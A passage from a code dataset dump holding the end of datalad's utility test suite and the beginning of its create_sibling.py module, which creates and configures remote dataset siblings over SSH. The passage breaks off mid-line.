eq_(target, list(g1_))\n eq_(called[0], 2)\n eq_(target, list(g2_))\n eq_(called[0], 2) # no new call to make a generator\n # but we can't (ab)use 2nd time\n eq_([], list(g2_))\n\n\ndef test_assure_unicode():\n ok_(isinstance(ensure_unicode(\"m\"), str))\n ok_(isinstance(ensure_unicode('grandchild_äöü東'), str))\n ok_(isinstance(ensure_unicode(u'grandchild_äöü東'), str))\n eq_(ensure_unicode('grandchild_äöü東'), u'grandchild_äöü東')\n # now, non-utf8\n # Decoding could be deduced with high confidence when the string is\n # really encoded in that codepage\n mom_koi8r = u\"мама\".encode('koi8-r')\n eq_(ensure_unicode(mom_koi8r), u\"мама\")\n eq_(ensure_unicode(mom_koi8r, confidence=0.9), u\"мама\")\n mom_iso8859 = u'mamá'.encode('iso-8859-1')\n eq_(ensure_unicode(mom_iso8859), u'mamá')\n eq_(ensure_unicode(mom_iso8859, confidence=0.5), u'mamá')\n # but when we mix, it does still guess something allowing to decode:\n mixedin = mom_koi8r + u'東'.encode('iso2022_jp') + u'東'.encode('utf-8')\n ok_(isinstance(ensure_unicode(mixedin), str))\n # but should fail if we request high confidence result:\n with assert_raises(ValueError):\n ensure_unicode(mixedin, confidence=0.9)\n # For other, non string values, actually just returns original value\n # TODO: RF to actually \"assure\" or fail?? For now hardcoding that assumption\n assert ensure_unicode(1) == 1\n\n\ndef test_pathlib_unicode():\n eq_(str(Path(\"a\")), u\"a\")\n eq_(str(Path(u\"β\")), u\"β\")\n\n\n@with_tempfile(mkdir=True)\ndef test_path_prefix(path=None):\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d2')), _p(''))\n # so we are under /d1/d2 so path prefix is ..\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d2/d3')), _p('..'))\n eq_(get_path_prefix(_p('/d1/d2/d3'), _p('/d1/d2')), _p('d3'))\n # but if outside -- full path\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d20/d3')), _p('/d1/d2'))\n with chpwd(path):\n eq_(get_path_prefix('.'), '')\n eq_(get_path_prefix('d1'), 'd1')\n eq_(get_path_prefix('d1', 'd2'), opj(path, 'd1'))\n eq_(get_path_prefix('..'), '..')\n\n\ndef test_get_trace():\n assert_raises(ValueError, get_trace, [], 'boom', 'does_not_matter')\n eq_(get_trace([('A', 'B')], 'A', 'A'), None)\n eq_(get_trace([('A', 'B')], 'A', 'B'), [])\n eq_(get_trace([('A', 'B')], 'A', 'C'), None)\n eq_(get_trace([('A', 'B'),\n ('B', 'C')], 'A', 'C'), ['B'])\n # order of edges doesn't matter\n eq_(get_trace([\n ('B', 'C'),\n ('A', 'B')\n ], 'A', 'C'), ['B'])\n # mixed rubbish\n eq_(get_trace([\n (1, 3),\n ('B', 'C'),\n (None, ('schwak', 7)),\n ('A', 'B'),\n ], 'A', 'C'), ['B'])\n # long\n eq_(get_trace([\n ('B', 'C'),\n ('A', 'B'),\n ('distract', 'me'),\n ('C', 'D'),\n ('D', 'E'),\n ], 'A', 'E'), ['B', 'C', 'D'])\n\n\n@with_tempfile(mkdir=True)\ndef test_get_dataset_root(path=None):\n eq_(get_dataset_root('/nonexistent'), None)\n with chpwd(path):\n repo = AnnexRepo(os.curdir, create=True)\n subdir = opj('some', 'deep')\n fname = opj(subdir, 'dummy')\n os.makedirs(subdir)\n with open(fname, 'w') as f:\n f.write('some')\n repo.add(fname)\n # we can find this repo\n eq_(get_dataset_root(os.curdir), os.curdir)\n # and we get the type of path that we fed in\n eq_(get_dataset_root(abspath(os.curdir)), abspath(os.curdir))\n # subdirs are no issue\n eq_(get_dataset_root(subdir), os.curdir)\n # even more subdirs are no issue\n eq_(get_dataset_root(opj(subdir, subdir)), os.curdir)\n # non-dir paths are no issue\n eq_(get_dataset_root(fname), os.curdir)\n\n\ndef _p(p: str) -> str:\n \"\"\"A helper to code paths as POSIX paths in tests below. Would prepend fake drive\n C: to absolute paths on Windows\"\"\"\n if on_windows:\n pm = p.replace('/', os.sep)\n if p.startswith('/'):\n return f\"C:{pm}\"\n else:\n return pm\n return p\n\n\ndef test_path_startswith():\n ok_(path_startswith(_p('/a/b'), _p('/a')))\n ok_(path_startswith(_p('/a/b'), _p('/a/b')))\n ok_(path_startswith(_p('/a/b'), _p('/a/b/')))\n ok_(path_startswith(_p('/a/b/'), _p('/a/b')))\n ok_(path_startswith(_p('/a/b'), _p('/')))\n ok_(path_startswith(_p('/aaa/b/c'), _p('/aaa')))\n nok_(path_startswith(_p('/aaa/b/c'), _p('/aa')))\n nok_(path_startswith(_p('/a/b'), _p('/a/c')))\n nok_(path_startswith(_p('/a/b/c'), _p('/a/c')))\n # must not mix relative and abs\n assert_raises(ValueError, path_startswith, _p('a/b'), _p('/a'))\n assert_raises(ValueError, path_startswith, _p('/a/b'), _p('a'))\n\n\ndef test_path_is_subpath():\n ok_(path_is_subpath(_p('/a/b'), _p('/a')))\n ok_(path_is_subpath(_p('/a/b/c'), _p('/a')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/b')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/b/')))\n nok_(path_is_subpath(_p('/a/b/'), _p('/a/b')))\n ok_(path_is_subpath(_p('/a/b'), _p('/')))\n ok_(path_is_subpath(_p('/aaa/b/c'), _p('/aaa')))\n nok_(path_is_subpath(_p('/aaa/b/c'), _p('/aa')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/c')))\n nok_(path_is_subpath(_p('/a/b/c'), _p('/a/c')))\n # must not mix relative and abs\n assert_raises(ValueError, path_is_subpath, _p('a/b'), _p('/a'))\n assert_raises(ValueError, path_is_subpath, _p('/a/b'), _p('a'))\n\n\ndef test_probe_known_failure():\n\n # Note: we can't test the switch \"datalad.tests.knownfailures.probe\"\n # directly, since it was evaluated in the decorator already. So we need\n # to have different assertions in this test based on config and have it\n # tested across builds, which use different settings for that switch.\n\n @probe_known_failure\n def not_failing():\n pass\n\n @probe_known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n switch = dl_cfg.obtain(\"datalad.tests.knownfailures.probe\")\n\n if switch:\n # if probing is enabled the failing is considered to be expected and\n # therefore the decorated function doesn't actually fail:\n failing()\n # in opposition a function that doesn't fail raises an AssertionError:\n assert_raises(AssertionError, not_failing)\n else:\n # if probing is disabled it should just fail/pass as is:\n assert_raises(AssertionError, failing)\n not_failing()\n\n\ndef test_skip_if():\n\n def dummy():\n raise AssertionError\n\n assert_raises(AssertionError, dummy)\n # if cond is False, call the decorated function:\n assert_raises(AssertionError, skip_if(cond=False, method='raise')(dummy))\n # raises SkipTest if cond is True\n assert_raises(SkipTest, skip_if(cond=True, method='raise')(dummy))\n # but with method 'pass', there is neither SkipTest nor AssertionError.\n # Instead the function call is just skipped:\n skip_if(cond=True, method='pass')(dummy)\n # But if condition is False, the original function is still called:\n assert_raises(AssertionError, skip_if(cond=False, method='pass')(dummy))\n\n\ndef test_skip_known_failure():\n\n # Note: we can't test the switch \"datalad.tests.knownfailures.skip\"\n # directly, since it was evaluated in the decorator already. So we need\n # to have different assertions in this test based on config and have it\n # tested across builds, which use different settings for that switch.\n\n @skip_known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n switch = dl_cfg.obtain(\"datalad.tests.knownfailures.skip\")\n\n if switch:\n # if skipping is enabled, we shouldn't see the exception:\n failing()\n else:\n # if it's disabled, failing() is executed and therefore exception\n # is raised:\n assert_raises(AssertionError, failing)\n\n\ndef test_known_failure():\n\n @known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n skip = dl_cfg.obtain(\"datalad.tests.knownfailures.skip\")\n probe = dl_cfg.obtain(\"datalad.tests.knownfailures.probe\")\n\n if skip:\n # skipping takes precedence over probing\n failing()\n elif probe:\n # if we probe a known failure it's okay to fail:\n failing()\n else:\n # not skipping and not probing results in the original failure:\n assert_raises(AssertionError, failing)\n\n\nfrom datalad.utils import read_csv_lines\n\n\ndef test_known_failure_direct_mode():\n # Decorator is deprecated now and that is what we check\n from .utils_pytest import known_failure_direct_mode\n\n x = []\n with swallow_logs(new_level=logging.WARNING) as cml:\n @known_failure_direct_mode\n def failing():\n x.append('ok')\n raise AssertionError(\"Failed\")\n\n assert_raises(AssertionError, failing) # nothing is swallowed\n eq_(x, ['ok']) # everything runs\n assert_in(\"Direct mode support is deprecated\", cml.out)\n\n\n@with_tempfile(content=\"h1 h2\\nv1 2\\nv2 3\")\ndef test_read_csv_lines_basic(infile=None):\n # Just a basic test, next one with unicode\n gen = read_csv_lines(infile)\n ok_generator(gen)\n eq_(\n list(gen),\n [\n {u'h1': u'v1', u'h2': u'2'},\n {u'h1': u'v2', u'h2': u'3'},\n ]\n )\n\n\n@with_tempfile(content=u\"h1\\th2\\nv1\\tдата\".encode('utf-8'))\ndef test_read_csv_lines_tsv_unicode(infile=None):\n # Just a basic test, next one with unicode\n gen = read_csv_lines(infile)\n ok_generator(gen)\n eq_(\n list(gen),\n [\n {u'h1': u'v1', u'h2': u'дата'},\n ]\n )\n\n\n@with_tempfile(content=u\"h1\\nv1\\nv2\")\ndef test_read_csv_lines_one_column(infile=None):\n # Just a basic test, next one with unicode\n eq_(\n list(read_csv_lines(infile)),\n [\n {u'h1': u'v1'},\n {u'h1': u'v2'},\n ]\n )\n\n\ndef _get_testm_tree(ind):\n \"\"\"Generate a fake package with submodules\n\n We need to increment index for different tests since otherwise e.g.\n import_modules fails to import submodule if first import_module_from_file\n imports that one\n \"\"\"\n return {\n 'dltestm%d' % ind: {\n '__init__.py': '',\n 'dlsub1': {'__init__.py': 'var = 1'},\n 'dlsub2.py': 'var = 2'}\n }\n\n@with_tree(tree=_get_testm_tree(1))\ndef test_import_modules(topdir=None):\n try:\n sys.path.append(topdir)\n mods = import_modules(['dlsub1', 'bogus'], 'dltestm1')\n finally:\n sys.path.pop(sys.path.index(topdir))\n eq_(len(mods), 1)\n eq_(mods[0].__name__, 'dltestm1.dlsub1')\n\n\n@with_tree(tree=_get_testm_tree(2))\ndef test_import_module_from_file(topdir=None):\n with assert_raises(AssertionError):\n # we support only submodule files ending with .py ATM. TODO\n import_module_from_file(op.join(topdir, 'dltestm2', 'dlsub1'))\n\n dlsub2_path = op.join(topdir, 'dltestm2', 'dlsub2.py')\n mod = import_module_from_file(dlsub2_path)\n eq_(mod.__name__, 'dlsub2') # we are not asking to import as submod of the dltestm1\n assert_in('dlsub2', sys.modules)\n\n try:\n sys.path.append(topdir)\n import dltestm2\n mod = import_module_from_file(dlsub2_path, pkg=dltestm2)\n eq_(mod.__name__, 'dltestm2.dlsub2')\n assert_in('dltestm2.dlsub2', sys.modules)\n finally:\n sys.path.pop(sys.path.index(topdir))\n\n\ndef test_import_modules_fail():\n # test that we log failures correctly\n failures = []\n import_modules(['bogus'], 'datalad', 'Fail {package}.{module}', failures.append)\n eq_(len(failures), 1)\n ok_startswith(failures[0], \"Fail datalad.bogus: No module\")\n\n\n# Should be the last one since as discovered in NICEMAN might screw up coverage\ndef test_line_profile():\n skip_if_no_module('line_profiler')\n\n @line_profile\n def f(j):\n i = j + 1 # xyz\n return i\n\n with swallow_outputs() as cmo:\n assert_equal(f(3), 4)\n assert_equal(cmo.err, '')\n assert_in('i = j + 1 # xyz', cmo.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_dlabspath(path=None):\n if not has_symlink_capability():\n raise SkipTest\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n opath = opj(path, \"origin\")\n os.makedirs(opath)\n lpath = opj(path, \"linked\")\n os.symlink('origin', lpath)\n for d in opath, lpath:\n # regardless under which directory, all results should not resolve\n # anything\n eq_(d, dlabspath(d))\n # in the root of ds\n with chpwd(d):\n eq_(dlabspath(\"path\"), opj(d, \"path\"))\n eq_(dlabspath(\"./path\"), opj(d, \"./path\")) # we do not normpath by default\n eq_(dlabspath(\"./path\", norm=True), opj(d, \"path\"))\n\n\n@with_tree({'1': 'content', 'd': {'2': 'more'}})\ndef test_get_open_files(p=None):\n pobj = Path(p)\n skip_if_no_module('psutil')\n eq_(get_open_files(p), {})\n f1 = pobj / '1'\n subd = pobj / 'd'\n with f1.open() as f:\n # since lsof does not care about PWD env var etc, paths\n # will not contain symlinks, we better realpath them\n # all before comparison\n eq_(get_open_files(p, log_open=40)[str(f1.resolve())].pid,\n os.getpid())\n\n assert not get_open_files(str(subd))\n\n if on_windows:\n # the remainder of the test assume a certain performance.\n # however, on windows get_open_files() can be very slow\n # (e.g. the first invocation in this test (above) can easily\n # take 30-50s). It is not worth slowing the tests to\n # accommodate this issue, given we have tested proper functioning\n # in principle already above).\n return\n\n # if we start a process within that directory, should get informed\n from subprocess import (\n PIPE,\n Popen,\n )\n from time import time\n t0 = time()\n proc = Popen([sys.executable, '-c',\n r'import sys; sys.stdout.write(\"OK\\n\"); sys.stdout.flush();'\n r'import time; time.sleep(10)'],\n stdout=PIPE,\n cwd=str(subd))\n # Assure that it started and we read the OK\n eq_(ensure_unicode(proc.stdout.readline().strip()), u\"OK\")\n assert time() - t0 < 5 # that we were not stuck waiting for process to finish\n eq_(get_open_files(p)[str(subd.resolve())].pid, proc.pid)\n eq_(get_open_files(subd)[str(subd.resolve())].pid, proc.pid)\n proc.terminate()\n assert_equal(get_open_files(str(subd)), {})\n\n\ndef test_map_items():\n def add10(x):\n return x + 10\n eq_(map_items(add10, {2: 3}), {12: 13})\n\n class Custom(object):\n \"\"\"For testing with custom items possibly of varying length etc\"\"\"\n def __init__(self, items):\n self._items = list(items)\n\n def items(self):\n return self._items\n\n c = Custom([(1,), (2, 3), (4, 5, 6)])\n c_mapped = map_items(add10, c)\n assert type(c) is type(c_mapped)\n eq_(c_mapped.items(), [(11,), (12, 13), (14, 15, 16)])\n\n\ndef test_CMD_MAX_ARG():\n # 100 is arbitrarily large small integer ;)\n # if fails -- we are unlikely to be able to work on this system\n # and something went really wrong!\n assert_greater(CMD_MAX_ARG, 100)\n\n\n@with_tempfile(mkdir=True)\ndef test_create_tree(path=None):\n content = u\"мама мыла раму\"\n create_tree(path, dict([\n ('1', content),\n ('sd', dict(\n [\n # right away an obscure case where we have both 1 and 1.gz\n ('1', content*2),\n ('1.gz', content*3),\n ('1.xz', content*4),\n ('1.lzma', content*5),\n ]\n )),\n ]))\n ok_file_has_content(op.join(path, '1'), content)\n ok_file_has_content(op.join(path, 'sd', '1'), content*2)\n ok_file_has_content(op.join(path, 'sd', '1.gz'), content*3, decompress=True)\n ok_file_has_content(op.join(path, 'sd', '1.xz'), content*4, decompress=True)\n ok_file_has_content(op.join(path, 'sd', '1.lzma'), content*5, decompress=True)\n\n\ndef test_never_fail():\n\n @never_fail\n def iamok(arg):\n return arg\n eq_(iamok(1), 1)\n\n @never_fail\n def ifail(arg):\n raise ValueError\n eq_(ifail(1), None)\n\n with patch.dict('os.environ', {'DATALAD_ALLOW_FAIL': '1'}):\n # decision to create failing or not failing function\n # is done at the time of decoration\n @never_fail\n def ifail2(arg):\n raise ValueError\n\n assert_raises(ValueError, ifail2, 1)\n\n\[email protected](reason=\"TODO: for some reason fails on Travis\")\n@with_tempfile\ndef test_is_interactive(fout=None):\n # must not fail if one of the streams is no longer open:\n # https://github.com/datalad/datalad/issues/3267\n from datalad.cmd import (\n KillOutput,\n NoCapture,\n StdOutErrCapture,\n WitlessRunner,\n )\n from datalad.support.annexrepo import (\n AnnexInitOutput,\n AnnexJsonProtocol,\n )\n from datalad.support.gitrepo import GitProgress\n\n bools = [\"False\", \"True\"]\n\n def get_interactive(py_pre=\"\", **run_kwargs):\n out = WitlessRunner().run(\n [sys.executable,\n \"-c\",\n py_pre +\n 'from datalad.utils import is_interactive; '\n 'f = open(%r, \"w\"); '\n 'f.write(str(is_interactive())); '\n 'f.close()'\n % fout\n ],\n **run_kwargs\n )\n with open(fout) as f:\n out = f.read()\n assert_in(out, bools)\n return bool(bools.index(out))\n\n # verify that NoCapture can make fully interactive execution\n # happen, also test the core protocols\n # (we can only be interactive in a runner, if the test execution\n # itself happens in an interactive environment)\n for proto, interactive in ((NoCapture,\n # It is unclear why (on travis only) a child\n # process can report to be interactive\n # whenever the parent process is not.\n # Maintain this test exception until\n # someone can provide insight. The point of\n # this test is to ensure that NoCapture\n # in an interactive parent also keeps the\n # child interactive, so this oddity is not\n # relevant.\n True if on_travis else is_interactive()),\n (KillOutput, False),\n (StdOutErrCapture, False),\n (GitProgress, False),\n (AnnexInitOutput, False),\n (AnnexJsonProtocol, False)):\n eq_(get_interactive(protocol=proto),\n interactive,\n msg='{} -> {}'.format(str(proto), interactive))\n # and it must not crash if smth is closed\n for o in ('stderr', 'stdin', 'stdout'):\n eq_(get_interactive(\"import sys; sys.%s.close(); \" % o), False)\n\n\ndef test_splitjoin_cmdline():\n # Do full round trip on a number of tricky samples\n for args in (\n ['cmd', '-o1', 'simple'],\n ['c o', r'\\m', ''],\n ['c o', ' '],\n ):\n cmdline = join_cmdline(args)\n assert isinstance(cmdline, str)\n eq_(split_cmdline(cmdline), args)\n # assure that there is no needless quoting\n if on_windows:\n # in quote_cmdlinearg we always quote on Windows\n eq_(join_cmdline(['abc', 'def']), '\"abc\" \"def\"')\n else:\n eq_(join_cmdline(['abc', 'def']), 'abc def')\n\n\n@skip_if_root\n@with_tempfile\ndef test_obtain_write_permission(path=None):\n path = Path(path)\n\n # there's nothing at path yet:\n assert_raises(FileNotFoundError, obtain_write_permission, path)\n\n # Revoke write permission\n path.write_text(\"something\")\n path.chmod(path.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, path.write_text, \"different thing\")\n\n # Obtain and try again:\n obtain_write_permission(path)\n path.write_text(\"different thing\")\n\n # Already having permission is no issue:\n obtain_write_permission(path)\n path.write_text(\"yet another thing\")\n\n\n@skip_if_root\n@with_tempfile(mkdir=True)\ndef test_ensure_write_permission(path=None):\n\n # This is testing the usecase of write protected directories needed for\n # messing with an annex object tree (as done by the ORA special remote).\n # However, that doesn't work on Windows since we can't revoke write\n # permissions for the owner of a directory (at least on VFAT - may be\n # true for NTFS as well - don't know).\n # Hence, on windows/crippledFS only test on a file.\n\n dir_ = Path(path)\n if not on_windows and has_symlink_capability:\n # set up write-protected dir containing a file\n file_ = dir_ / \"somefile\"\n file_.write_text(\"whatever\")\n dir_.chmod(dir_.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, file_.unlink)\n\n # contextmanager lets us do it and restores permissions afterwards:\n mode_before = dir_.stat().st_mode\n with ensure_write_permission(dir_):\n file_.unlink()\n\n mode_after = dir_.stat().st_mode\n assert_equal(mode_before, mode_after)\n assert_raises(PermissionError, file_.write_text, \"new file can't be \"\n \"written\")\n\n assert_raises(FileNotFoundError, ensure_write_permission(dir_ /\n \"non\" / \"existent\").__enter__)\n\n # deletion within context doesn't let mode restoration fail:\n with ensure_write_permission(dir_):\n dir_.rmdir()\n\n dir_.mkdir() # recreate, since next block is executed unconditionally\n\n # set up write-protected file:\n file2 = dir_ / \"protected.txt\"\n file2.write_text(\"unchangeable\")\n file2.chmod(file2.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, file2.write_text, \"modification\")\n\n # within context we can:\n with ensure_write_permission(file2):\n file2.write_text(\"modification\")\n\n # mode is restored afterwards:\n assert_raises(PermissionError, file2.write_text, \"modification2\")\n" }, { "alpha_fraction": 0.5496479868888855, "alphanum_fraction": 0.5510939359664917, "avg_line_length": 39.44774627685547, "blob_id": "325162516fc5fa951a97db93825ec395381b37da", "content_id": "7ae1d966c259394f683916ce68b61c761d0ecd70", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42187, "license_type": "permissive", "max_line_length": 95, "num_lines": 1043, "path": "/datalad/distribution/create_sibling.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creation of publication target via SSH\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nfrom os.path import curdir\nimport shlex\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n relpath,\n)\n\nfrom looseversion import LooseVersion\n\nfrom datalad import ssh_manager\nfrom datalad.cmd import (\n CommandError,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.consts import (\n TIMESTAMP_FMT,\n WEB_META_LOG,\n)\nfrom datalad.core.local.diff import diff_dataset\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.distribution.siblings import (\n Siblings,\n _DelayedSuper,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n annex_group_opt,\n annex_groupwanted_opt,\n annex_wanted_opt,\n as_common_datasrc,\n inherit_opt,\n publish_by_default,\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n InsufficientArgumentsError,\n MissingExternalDependency,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.network import (\n RI,\n PathRI,\n is_ssh,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import (\n _path_,\n ensure_list,\n make_tempfile,\n on_windows,\n)\nfrom datalad.utils import quote_cmdlinearg as sh_quote\nfrom datalad.utils import slash_join\n\nlgr = logging.getLogger('datalad.distribution.create_sibling')\n# Window's own mkdir command creates intermediate directories by default\n# and does not take flags: https://github.com/datalad/datalad/issues/5211\nmkdir_cmd = \"mkdir\" if on_windows else \"mkdir -p\"\n\n\nclass _RunnerAdapter(WitlessRunner):\n \"\"\"An adapter to use interchanegably with SSH connection\"\"\"\n\n def __call__(self, cmd):\n out = self.run(cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get_git_version(self):\n return external_versions['cmd:git']\n\n def get_annex_version(self):\n return external_versions['cmd:annex']\n\n def put(self, source, destination, recursive=False,\n preserve_attrs=False):\n import shutil\n copy_fn = shutil.copy2 if preserve_attrs else shutil.copy\n if recursive:\n args = [source, destination]\n kwargs = {\"copy_function\": copy_fn}\n try:\n shutil.copytree(*args, **kwargs)\n except FileExistsError:\n # SSHConnection.put() is okay with copying a tree if the\n # destination directory already exists. With Python 3.8, we can\n # make copytree() do the same with dirs_exist_ok=True. But for\n # now, just rely on `cp`.\n cmd = [\"cp\", \"-R\"]\n if preserve_attrs:\n cmd.append(\"-p\")\n self(cmd + args)\n else:\n copy_fn(source, destination)\n\n\ndef _create_dataset_sibling(\n name,\n ds,\n hierarchy_basepath,\n shell,\n replicate_local_structure,\n ri,\n target_dir,\n target_url,\n target_pushurl,\n existing,\n shared,\n group,\n publish_depends,\n publish_by_default,\n install_postupdate_hook,\n as_common_datasrc,\n annex_wanted,\n annex_group,\n annex_groupwanted,\n inherit\n):\n \"\"\"Everyone is very smart here and could figure out the combinatorial\n affluence among provided tiny (just slightly over a dozen) number of options\n and only a few pages of code\n \"\"\"\n localds_path = ds.path\n ds_name = relpath(localds_path, start=hierarchy_basepath)\n if not replicate_local_structure:\n ds_name = '' if ds_name == curdir \\\n else '-{}'.format(ds_name.replace(\"/\", \"-\"))\n remoteds_path = target_dir.replace(\n \"%RELNAME\",\n ds_name)\n else:\n # TODO: opj depends on local platform, not the remote one.\n # check how to deal with it. Does windows ssh server accept\n # posix paths? vice versa? Should planned SSH class provide\n # tools for this issue?\n # see gh-1188\n remoteds_path = normpath(opj(target_dir, ds_name))\n\n ds_repo = ds.repo\n # construct a would-be ssh url based on the current dataset's path\n ri.path = remoteds_path\n ds_url = ri.as_str()\n # configure dataset's git-access urls\n ds_target_url = target_url.replace('%RELNAME', ds_name) \\\n if target_url else ds_url\n # push, configure only if needed\n ds_target_pushurl = None\n if ds_target_url != ds_url:\n # not guaranteed that we can push via the primary URL\n ds_target_pushurl = target_pushurl.replace('%RELNAME', ds_name) \\\n if target_pushurl else ds_url\n\n lgr.info(\"Considering to create a target dataset %s at %s of %s\",\n localds_path, remoteds_path,\n \"localhost\" if isinstance(ri, PathRI) else ri.hostname)\n # Must be set to True only if exists and existing='reconfigure'\n # otherwise we might skip actions if we say existing='reconfigure'\n # but it did not even exist before\n only_reconfigure = False\n if remoteds_path != '.':\n # check if target exists\n # TODO: Is this condition valid for != '.' only?\n path_children = _ls_remote_path(shell, remoteds_path)\n path_exists = path_children is not None\n\n if path_exists:\n _msg = \"Target path %s already exists.\" % remoteds_path\n if path_exists and not path_children:\n # path should be an empty directory, which should be ok to remove\n try:\n lgr.debug(\n \"Trying to rmdir %s on remote since seems to be an empty dir\",\n remoteds_path\n )\n # should be safe since should not remove anything unless an empty dir\n shell(\"rmdir {}\".format(sh_quote(remoteds_path)))\n path_exists = False\n except CommandError as e:\n # If fails to rmdir -- either contains stuff no permissions\n # TODO: fixup encode/decode dance again :-/ we should have got\n # unicode/str here by now. I guess it is the same as\n # https://github.com/ReproNim/niceman/issues/83\n # where I have reused this Runner thing\n try:\n # ds_name is unicode which makes _msg unicode so we must be\n # unicode-ready\n err_str = str(e.stderr)\n except UnicodeDecodeError:\n err_str = e.stderr.decode(errors='replace')\n _msg += \" And it fails to rmdir (%s).\" % (err_str.strip(),)\n\n if path_exists:\n if existing == 'error':\n raise RuntimeError(_msg)\n elif existing == 'skip':\n lgr.info(_msg + \" Skipping\")\n return\n elif existing == 'replace':\n remove = False\n if path_children:\n has_git = '.git' in path_children\n _msg_stats = _msg \\\n + \" It is %sa git repository and has %d files/dirs.\" % (\n \"\" if has_git else \"not \", len(path_children)\n )\n if ui.is_interactive:\n remove = ui.yesno(\n \"Do you really want to remove it?\",\n title=_msg_stats,\n default=False\n )\n else:\n raise RuntimeError(\n _msg_stats +\n \" Remove it manually first or rerun datalad in \"\n \"interactive shell to confirm this action.\")\n if not remove:\n raise RuntimeError(_msg)\n # Remote location might already contain a git repository or be\n # just a directory.\n lgr.info(_msg + \" Replacing\")\n # enable write permissions to allow removing dir\n shell(\"chmod -R +r+w {}\".format(sh_quote(remoteds_path)))\n # remove target at path\n shell(\"rm -rf {}\".format(sh_quote(remoteds_path)))\n # if we succeeded in removing it\n path_exists = False\n # Since it is gone now, git-annex also should forget about it\n remotes = ds_repo.get_remotes()\n if name in remotes:\n # so we had this remote already, we should announce it dead\n # XXX what if there was some kind of mismatch and this name\n # isn't matching the actual remote UUID? should have we\n # checked more carefully?\n lgr.info(\n \"Announcing existing remote %s dead to annex and removing\",\n name\n )\n if isinstance(ds_repo, AnnexRepo):\n ds_repo.set_remote_dead(name)\n ds_repo.remove_remote(name)\n elif existing == 'reconfigure':\n lgr.info(_msg + \" Will only reconfigure\")\n only_reconfigure = True\n else:\n raise ValueError(\n \"Do not know how to handle existing={}\".format(\n repr(existing)))\n if not path_exists:\n shell(\"{} {}\".format(mkdir_cmd, sh_quote(remoteds_path)))\n\n delayed_super = _DelayedSuper(ds)\n if inherit and delayed_super.super:\n if shared is None:\n # here we must analyze current_ds's super, not the super_ds\n # inherit from the setting on remote end\n shared = CreateSibling._get_ds_remote_shared_setting(\n delayed_super, name, shell)\n\n if not install_postupdate_hook:\n # Even though directive from above was False due to no UI explicitly\n # requested, we were asked to inherit the setup, so we might need\n # to install the hook, if super has it on remote\n install_postupdate_hook = CreateSibling._has_active_postupdate(\n delayed_super, name, shell)\n\n if group:\n # Either repository existed before or a new directory was created for it,\n # set its group to a desired one if was provided with the same chgrp\n shell(\"chgrp -R {} {}\".format(\n sh_quote(str(group)),\n sh_quote(remoteds_path)))\n # don't (re-)initialize dataset if existing == reconfigure\n if not only_reconfigure:\n # init git and possibly annex repo\n if not CreateSibling.init_remote_repo(\n remoteds_path, shell, shared, ds,\n description=target_url):\n return\n\n if target_url and not is_ssh(target_url):\n # we are not coming in via SSH, hence cannot assume proper\n # setup for webserver access -> fix\n shell('git -C {} update-server-info'.format(sh_quote(remoteds_path)))\n else:\n # TODO -- we might still want to reconfigure 'shared' setting!\n pass\n\n # at this point we have a remote sibling in some shape or form\n # -> add as remote\n lgr.debug(\"Adding the siblings\")\n # TODO generator, yield the now swallowed results\n Siblings.__call__(\n 'configure',\n dataset=ds,\n name=name,\n url=ds_target_url,\n pushurl=ds_target_pushurl,\n recursive=False,\n fetch=True,\n as_common_datasrc=as_common_datasrc,\n publish_by_default=publish_by_default,\n publish_depends=publish_depends,\n annex_wanted=annex_wanted,\n annex_group=annex_group,\n annex_groupwanted=annex_groupwanted,\n inherit=inherit,\n result_renderer='disabled',\n )\n\n # check git version on remote end\n lgr.info(\"Adjusting remote git configuration\")\n if shell.get_git_version() and shell.get_git_version() >= LooseVersion(\"2.4\"):\n # allow for pushing to checked out branch\n try:\n shell(\"git -C {} config receive.denyCurrentBranch updateInstead\".format(\n sh_quote(remoteds_path)))\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"git config failed at remote location %s.\\n\"\n \"You will not be able to push to checked out \"\n \"branch. Error: %s\", remoteds_path, ce)\n else:\n lgr.error(\"Git version >= 2.4 needed to configure remote.\"\n \" Version detected on server: %s\\nSkipping configuration\"\n \" of receive.denyCurrentBranch - you will not be able to\"\n \" publish updates to this repository. Upgrade your git\"\n \" and run with --existing=reconfigure\",\n shell.get_git_version())\n\n branch = ds_repo.get_active_branch()\n if branch 